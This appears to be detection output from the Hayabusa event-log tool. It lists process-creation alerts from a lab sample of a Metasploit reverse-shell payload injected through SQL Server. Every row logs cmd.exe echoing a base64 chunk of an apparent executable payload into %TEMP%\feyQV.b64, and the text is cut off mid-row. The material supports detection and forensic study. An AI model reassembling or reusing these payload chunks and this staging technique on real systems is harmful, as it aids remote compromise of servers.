AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x414 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
2020-08-02 07:58:09.721 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x8f4 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
2020-08-02 07:58:09.995 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x106c | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
2020-08-02 07:58:10.269 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFWL7IHsEQQA5bjUAuwAH1ajfhfFABqpn0EAo0RAQQCjBBgDADMKxUhPjgBXjUUM5iGOc6pRx+HwF0EARNJABJUdQDxBUG7WTAAAaOBfQADo2KQAAIPEBFNTU2hMQKcA6Ds+ANSLVQyGIgiLYEx+QQBSUI1V9FFS6GRKAACLVfSNRfyNTftQUWgU0kABUujeSgA3hcAPhZoEPEqLNWj6QKoPvkX7g8Bag/g5D4dmBAAAM7iKiAgXQAD/JLaYFkAAi1X8UsAVbMFAs4PEBDvDoxBUnnAPsT0E0C1o+M9AE+htLAAA6SuTAADHBdQCQQABAAAA6R8Efk+JHRRZQADpFAQrAItF/FD/FVOh2ACjGPpAq+kWMgAAi02l2v8LbMGPAKOoAkEA6enPAAA5HWACLAB+DWgc0UAAzhQLAABuxATHJmACZAD/////6USc>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xc48 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
2020-08-02 07:58:10.544 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AACLVfxS/xWIwUA6o7gL2wDpsQMAACYdHNDmAOmpLAAAi0X8UP8ViMFAAFgvFygA6ZIWAACJHSDQQADpGAMAANYdYGnAm3QNaLzRQABM4AUAAIPEBIv2/AirhjUABYMxGzt8dVbHBTsCQQABAAAA6SukHgA5HSA4QQAPhEoDAABQ/xVwV0DsOR1gAkEAdFBuoDNAEug2BQAYg8QEi1X8Ujc/NQAAg8QEO8N1D8fnYOBBAAIAAADpDwMqADkdAjhBAA+EAwMAAFAMFXDBfQDH+FxlQQBUAAAA6e17/gCLSfxQNxVsFkAAllgCpADp1gIAiotu/FH/FWyMQACjZBoyAD5pENBAAN7DAABPuAIAAItF/LqVrkGDudCKCIgMVkA6H3X26aIXAC2LVVuhkiNhMVNonNFAAKpokNFMAFDoXkYAAIPEFCFEQEFz6XsCAK6LjPyLDXTB4q+DOQF+ETPSqAiKF1L/Oo0Yg4PECOsSiw1DwUDTM8CKB4sRigRCg/jAO8N0BkeYffzryIPJ/zNR8v730Uka6MqgAAA9AAQAhHYNaGjRQL/oWQQAm4PEBItV/Bfq/4v6M8DyrvfRI42F9Pv//1FSUHB4oAAAU/+N9Ir//2ic0UAAkGhQ0UAa6Y4A+7WLfe+LDXTBQACRzgF+ETPSTMeKF3D/+o99/IPESOsSoA149kAA/NmKHYsRihVCgwEIrcN0BkeaffzryIP3TTPA8q73tElR6OugAJI9AFAJAHYNaDTRQADoEwMMHYOdpItS/IOe/4v6yMDyrvf8SaKF9ML///VSUOc2oE0AU42N9Pv/UGiW0UAAUWiF0YkAixUEGEEAiJwF9Pv/G6FMQEEAUlDou0QAAIPEGKMEGEFe6V0BAACLTfyLFUhAwgChTEBBAFNonDtAAFFSUBWSRAAAi022iz2MwXoApAVoENFAAFGjSEBBAP8Ag/wghcB1D8fCfDpBlIsAAADp6gAAS4tV/GoHCwjRQABS/ziDxAyFwM0PSQWEAkEAagAAyenHAAAxHkX8agto/NCOAFD/1wHEDIV7DxfWAAAAxwWAAgwAAQAAxOmghwAAx4GIQ7GFUAAAAOmRAAAAi038x6iIYkEAIioAzokN6JEqG9NHi1XKgTrqXrh8wUAAg8QIwcPgErQY/1D/FbjBJwCDxASjdAJBAIvMK7pAPJ4AK9CKygoMAnA6y3X2Ga54AkEAAQAAAOvQvkX8xwWIDkEAAQAAAFOoFEEA6yOLTfzHBYgCQQCpAAAAhIO1F0FlsQ6LVQyLAlCO/S0AAIPEFotF9I0V/I1V+1FSaBTSQABQ6ERGAACFwA+ER/v//4tF9ItNCN81gHJAAEk5SHW+1ouGDIsWyMBAACbZQIsCUNvc0EAAokvWi1XTiwJQ6GstAACLRfSDxECLSKZ8UByLFIpBiUgyoUxAYACzUOjJK7Qrs+iaLwAAg8QEhcB0U4tqPaHIwEAAZMBA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x1184 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
2020-08-02 07:58:10.819 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo ixFSaMjQMgBQ/9aLTQyL6VK/W5MAAH3EEKHL0EAAO9l8Bz0gXAAAsS+LRQyLFcjAQABoIE5vAIPCQD8rUWig0EAAUqTWi0UMizis6CEtAAChGNBAAIPEFIsN9dBAADvBfivCVfaLDcjAfwCDwUA2sVBo5NBjAFH/1otVDIsCUOjtLAAAi28Q0EAAg8QROR0U0MAAdD6B+Zb5AAB+DxlnZmZm5NXB+o+ZysHpHwPRg72diRUU0EAAfSDHBRTQQABkAAAA/xTUN0UAAF9eM8Bbi+Vdw4kdFNBAAOgjLNAA/Q4RAACLFUxAQQBS6HI3AABfXgXAW4vlXcOQmxJAAHQSQADiE0AALhNAAIERQBtbEkAAOxZgAJr8QAAWEUAAAsVAAGJvQiZtEUAAThFAewgVQAAqP0AA6BBAAL8QQACMf0AAcudAABoSQAA9EjgAOxFAslkSfAB2FIwAhRRAAN8UQCXzFEAAFhVAAAAbARu3GxsuGxsbG6AbmQMbsQSFGwYbBxsbrRsbGxsbG4kJClYbDA0OGw8bqibqERKcGxQVFhcYGRqQkJCQkJCQkMSQkHKQWFXh7ItFCI1QyMBAAFCDwfxoadJAAFH/FYDBPgChrAJBAB7EBYXAdA9QaJrSQAD/FWTBQACDxAhqAf8VcMFAAJBVi+yB7LgAAEiheLlBToXAoUxAQQB0FGgxPJcAUP2eQAAAZosNdKxB50kUi7ReGEEAUlDoiEAAAGaLDfR3QQDpCBhBAKGIAkEAYO+LNWTBQOFmiQ1VC0EAhcCwdV2LFUoYCQBSIGi1QAD/1qV4AmgAg8QIhcB0FaF0AkEAUFdAmEEAaNhjQAD/hYNaDDvC0EAAhcBigNRAAHUF23wYQABQylLU/wD/1ovSyLpAAIPBIFH/FVTBQACDxAyLFRjQQADoNYfBQABojJEAAHgDTLuwC0EAjBAmQABqIFD/1ou8TEBBAFIVGNB6uYPEEIwuIEEAagBRmmj4F0HA6IFHAC6FwHT2UKdQKEAA6OIFAACDOAihfAJBAIXAyTWhrAtBABsNnAtB/YsVSBRBAGoAgZzRQABQoUxAQetRaEjUQABSUOi7iQAAgy0csEhAQQDrBUNIQEEAi6WAAkEAhcl1JosQTEBBANMAaJzRQEtoRNRAAGgr4EAAUFHohD8AXYPCGKNIQEEAiw2EAnoAhcl1HIsVTEBBAEgAxxjUGQB6UktePwARgy4Qo0gtQQCLx2AGQQC9yX8viydoAkEAvvzTQACF0nUFvtQCQQCLFXgCoQCF0osVQEBBAHUGixXkF0FnhWW5+NNAAHQFbG/TQABQRQQYuGRQoXRAQQBQmFJRiw0w0EAAaNTTBQBoAAgAAFFN3paSAIOnb+t9ihWJOEEAv0CBYAB20nBuv8jTQACLmmgCQQC+/NM1DYXSdQW+1AJBAIsVeAI9AIXSixVAQPIAdQaLFeQbqwCD+QG5wNNAAHQFubym>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x224 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
2020-08-02 07:58:11.094 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo QABQoXBPQQBXUOljGEEA2aFEcEEAUFZSUYuoMNAyAGh400AAaAII+wAa6J5vAACDxCw9AAgAAHINaAXTQADoAv3/44PEBKFYAkEAuwIAOgA7w1kpoWDgQQA7w7jQ00B5KvG4udMKAIsVJ/RAllJQBgLTQKv/FWjBQABGxAyLZTDQQACDyf8zwPKuoWACQQBZX0mD+AGJDewXUgB8cKFwAkEAjUxqAVH/FVzBQAClxASDwHUfpxXxwEAAaBTTMwCDwo9S/xWAwUAx1cQIKOK2i+Vdw4sVMNBAAIvwFEBCiA5GhMl1A6cV7BdBAA8NcAL2mos1IDhBAI08AovywekCb6WLyoPhsfOkozDQpgBXTEC8AGaLDbQLyQCLFQgYQQBQTQBRagBSk/wXvQDoDlQAAIvwZoW/dCyhCBhBAI2NSP///1Bo9NJAAFBeUeg+azAAD79xfatI/7z/UlDo7uAA4IPEGOimTgAAi/ChZAJBAIv6pTigC0EAhcCJPaQLQQCJNcDLQQCJhsR8QQB055lqemhA7ZEAUlDoXJkAAON5E9eJt+xAVfDrDsfz7P/////HRfD/5/9/aBcgWwBT/xUTwf4AoRjQQAAYZQgz9oXATTEz/6cNsAuzAIm0D1hT+QDLFbCtQRqNBBdQ6IAcAKOhGND/AIPEBFWBx2AIAABy8Hxmiw0YZkAAs1XoiU38iw0s0KYAjUX8UosVKNBAAFGh+AWzAFFSUOiDRwAAhWeKDlBo6NIkAAIUAgAAg8QIi0X8hcB1VWjU0kAAOhD7h/+DxATINvzHM/ScAAAAhcAPjrVTAG3HRcgAEwAAL034BkXoi3QBRIsmCIXJD4QoRgAAixKtKuFcAgr2wyN0cw/o3FYAAIPTBKtpUA/q5vEAAPbDBA9GsQAAAIN+EgEPhZ4AAACh/BdBAItO0VBR6I5LAACLDfgXQQCLVosy+I1FwFBRx0XEAQARCYlVzOgvRQAAG4X/dPYMVgRS6DFLAACLtcQCQTOhSQJBAEOLyEAB+QqJubEC+gCjuJGHAH4mixXIwEAJaLDSQACDXUDq4xWAwUBQD792UGiY0kAA6B/dAACDxBDHRggAAAAA62N/RggCACPcixWoAkEAQonYFAJBXkzoWQEAAIPEBIN+CAN1SYtOBCkBAAAAiU2MiYlF3KH4F0EAjS7QUlA0TfqJdeToTNWTAOs2ND24AkEAixXM+0EAMUKJPbhHQQCJlykCQQBW6Mo6APWDxASLRfKLVfiVTfxAg8LVO8GJRdaJVfgPtiIn//+LDbyKQQCLj03jNaGbAkEAfxt8DSkVRD5BABpN7Du1cww7BQ3QQACNjBK8//+LDRS1QACFyXQaUKHIpEAAg8BAFIDSQABQ/xWAwUCAg8QM64poeNJAAP8VWMFAhYPEBNaIAkEAhcDlDOjffWEAX15bi2ldw0gA6DECANluxARfXluL5V2nF5CQkJCQclWL7Lfs>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xec4 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
2020-08-02 07:58:11.368 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo eOOLdQxWjUWIaniEVuiJaAAAi00IwBXIwEAArFGDwkBorN5AAIz2FYCuQAChrAJBAIPEFGPAdMxQaNfS3fU6FaC9zgCDxAhW/xVwwWEAXpCQRJDMkA6Q2ZC8OVWL7IPsFNRWuXUIV4tGFIlFwehJGgAAS6ALMgCJFaQLQQDM2ItGD4XAzvp1QIsNBGoAagBR6JaLAADNnjgIAACJvjwIAABcRhgAAAC8ixVUF7MAiVZzUbeQQQCFwHQ7oXACQQDNygPIiU776wKfjjgIpDOhKNAXAIsV8tA8AI/Ii4Y8CAAAE8I7+A+P5QAAAHwIO/4Ph6YAAACL3hiLHTDQQACLRgSNY3UDKFEWUOitawAAhRIqM4PBC8TRPWj9CgB0Jz3ZSQoAdLmYV/0KAKUZPST9CgB0Ej2hw5MAtwsOsyMLABWlpgAANIuoCIsdoAJBAIv6pAJBAAPcg9cviR2gAkEAiT2kIEEAi1YYi042A9boyIlWGImCtg+F7Jr1/8dGCN0AAC/oNEoAZaOgC0EAiRWkC10AkFYEibFACAAAMw2kC0FyuAEAAAAsRfBm1EX0iY5ECAAAi+trF/YcjUXsiU74UOqJzvzGH0BHAF9eW/zlXcN04NReAP8VZMFAX1boahoAAIPECMZeW4vlXcOLHbwCQQBovNRAAEOJJLwCQQAxq2TBGOhW6EIaAACDxAhfXluL5V3DkJCQkJCQkJBVi+yz7LzGAACLRZmVwHSG9YsJqwAQoAtBMokVpAtBPusLixWkC0EAoaA4QQDTix1tC0EA/leLPfcLQd8r0u7XifvYiVXQizVkwUAA34/YaLSY2gC0+kHCQADdXdC01mgvOUEZaKjfQAD/1qEAGEEAUGhGoUAA/8QzyWaLDUzdQQAvaMvfQAD/1miA1EAAw9YcFcNeQQAGJJ7fQMxv1rut0kEAUGgc30AA/9bTP9RAAP/Wiw3r3EAAlFkA388A/9aLVeKLRdBSFGjY3roA/9aLDawCQQCDxJ1RaLzFQAD/1osVuALnAFJooN4RAP/WqbjOQQCDxBCFwHQkocwCQemLDR4C7wAqFX8C4QBQocQCQQBRUlBokt5AAETWg/ROi5K8AkEAUWhI3kAAlNah0AJBAIPECIXAdHYoaCzeLgD/1oDECKEzYUEAhcB0EXQVsAKZAFJoEN5AANBKG1MIoZQCQQCLDcICQf5QUWjo3UAA/2ShYAJBiYPXDBb4AXUXixWkAkEM9KACQQBSUMLIpEAA/96DxAyDPWACQS4CdRiLaKQCQQCLFaACQQBRBmio3UAA/9aDxAyhnOKWuosNmDxBAFBRE4QUQAD/1n1F0NwdMMJAiebEDN/g9sRED4tqAAAAoewC2wCFwA+Ed6YAAN0FKMJAANx10IPsCN1dgNsFrAJBANxNgN0chGhQ3UAA/9bbBRjQQACDQQTcaNDcDSDnQADarqwCQQBCHPJoJN1AAP+c3UWV3A0g>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x274 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
2020-08-02 07:58:11.643 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo wrR1g8QERzWsAugA3RyLaCjfQAD/1t+/kAJBAIPEBNxNgD0NGMJA+N0cFGik3EAA/9YsYAJBAIOlDIXAflnfO6ACd3KDyQjcTYDcDRjCUgDdHCQQfNJAAP/Wi+TfAkFaBrmQWLRjoaQCQQCLPZR/QQDw0xPHiQzYiUXcgwAE323Y3E2A3A14wkCo3RxHaIAIQAD/D4PEDKGsAkEAT8APjocNAAAzyerP/yb///9/O8FTTcCJTcSJTciJTQmJKuCJ1OSJTeiJTSaJfbCJVUSJfVeJdclTvWD////zlY////+JfQaJVdSJjXD///+JjXQ2//+ETbiJDPKJjTb//9mJjWyR//+JTYCJsISJjXiE//+JjXz///+JNQCJTayJTYgLTYyJTZCJTZSSjosBAAD6WcgLQRll0vSDwRCJZfxVeQSLRbSLGVLHfA2RBTktJHIGtl2wiX20i0EMi1EIOUWkfA2LBRoPoFAGiSKg3EWkK9Mbx4u9ZFD//zv4YhaiCDmVe///KHIMiZVg//9EiYVk//81i3kJi1nPOX3UfBJ/CvOJ0Ds1i3/hcgaJXfeJ7dSLnXRIsP/UWV5/J3wPo038i51w//8jrHE72XcWh838i6aJnXD///+LWdmJnXT////rA89N/ItJCYtdvDvZfyB8DfuyX4tduOBJYDvZdxGLTfyLWQiJXbhhQgyJXbzrAyRO/DmFbP//738WfAg5lcf///9DDImVaP///4mFbP///zl9hH8YfOWLSfiLXYA72cUe/HcJJFnciX1fifyAi+SLXcAD2YtN/IldwItdxA1JBPrZLk38uyPUi13Ii0kIA9mLTfyJXch9XcyLSQxY2YtNEr7K71XoiV3MISSHiU3guPX8ntiLU/iJ3lOLXewD0Iuz9IlVsRPfg8EgSIld7IlN/IlFsw+Fe/5e/6GsAkGUmYva3FXEi/iLRcAcV1JQpSaQAACLTcyJVZ2LVchTV1FSiUX4jBGQAACpTbyJRZiLTeRTV1BRplW56PyZtTqJVcyLVewpRciLRbpTV1JQ6OeNADUTD8ChrAJBAIXAiVWQD46IAAAA322Yiw3IpkHr3V3Y321ejQIQi0usAkEA3Vvx32033V3o323A3V3R3YV45WH/3UWo3UX03UWQ92gI3UXYg8AgSdjp2cDvySPG3evfaODdReDY6dnAu8neYt0x2YnY4SVl6NnJNNjZwMDJ3sPd2N9o2Npl8NnA2Mnewt3YdbLdgJDdhIjdXfXrBtyFeP///6HYAkEAr/gBV9uNUP+JVfT/RfTY+dn63Z14////6xRS9XjH/3wAAAAAx4V8rAb/AADbAIP4Ad3Yy5ONSP+JTbHbRfjcfajZ+t1dqOsOtUWIAAAAAMcucoUAALGDsAF+E41Q2YlV9Nss9Nz9iNkx3V1x61nHRYgAAADvx0WMjgAAAIP4AX4sjUj/iU0829/04X2Q2Yr1FKvrDsdFYgAAAADH>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xe28 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
2020-08-02 07:58:11.917 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo RZQA/QAAixXIC0EAaCwwIwBqIFDH/zNEwUAAiz2sXEEAg0aNg/8BfkCLhCUBAACAeQV8g8j+QHQwi+iLHaAYQQCZmsIJANH4weBDA8NqAotIMItQEANTi1A0E1AU3VHoQY4AAIlF8Osbi8eLHWQLQQCZrcLR+MHgBYtMGBCJTf+LVBgUaBIxQAAfIDlTs5v0XBVEweEAlz2sAkE+g8oQg/8Bfk+LxyWOegCAeQWUg8j+QHQ/48eLHcjeQQCZKydqANH4E+AoA8NqAosePotQCSspi1A8G1A0K0gQG1AUA3hjxikcUlHoPI0AAIlF6IlVPus7i8eLPcgfQS+ZK8Iz+MHgBQPDi4cdi2pmA8qLS5WJTSOLSBx5yolN7HzAMUAAaiBXU4YVRMGv4YtArAJBAIP1EIP/AX5APcclAQAAgKgFtoPIS0B0MIvoix3IC3wAmSvCagDR+MFoBVjDagKLNyiLUAgDyItQLBNNDFJR6ICN2C6JReCiG6LHix3IC0EAmSsf3PjB4AWLTBgIiU3gi90YDGggMQgAaiBXU4kr5CQVRMFAdqGsAkEAQMQ3g/gBn0KLy